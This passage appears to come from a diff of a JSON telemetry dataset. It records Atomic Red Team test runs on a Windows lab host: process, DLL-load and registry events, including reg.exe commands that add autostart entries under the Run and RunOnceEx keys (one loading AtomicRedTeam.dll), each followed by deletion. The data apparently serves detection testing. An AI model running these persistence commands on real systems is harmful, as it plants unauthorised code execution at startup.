}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_value": "Run", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "registry", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", - "registry_value": "Atomic Red Team", - "timestamp": 131883570852770000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "process", - "pid": 6156, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107E004D01}" - }, - { - "event_type": "file", - "file_name": "REG.EXE-26976709.pf", - "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 260, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00108BFF4C01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2888, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570852930000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "command_line": "REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5688, - "ppid": 2888, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570853120000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "registry", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team", - "registry_value": "Atomic Red Team", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "process", - "pid": 5688, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EB034D01}" - }, - { - "event_type": "process", - "pid": 2888, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570853080000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F8024D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2580, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853310000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853240000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "event_type": "process", - "pid": 2580, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570853400000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-001048054D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5084, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570853980000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570853860000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "command_line": "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7008, - "ppid": 5084, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570854120000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854020000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "registry", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_value": "Depend", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "registry", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", - "registry_value": "1", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "process", - "pid": 7008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00109C0A4D01}" - }, - { - "event_type": "process", - "pid": 5084, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854180000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010A6094D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3792, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "command_line": "REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1484, - "ppid": 3792, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570854459984, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}", - "unique_ppid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854330000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "registry", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend\\1", - "registry_value": "1", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "process", - "pid": 1484, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010EC0C4D01}" - }, - { - "event_type": "process", - "pid": 3792, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010F80B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1688, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570854620000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570854490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-0010460E4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - 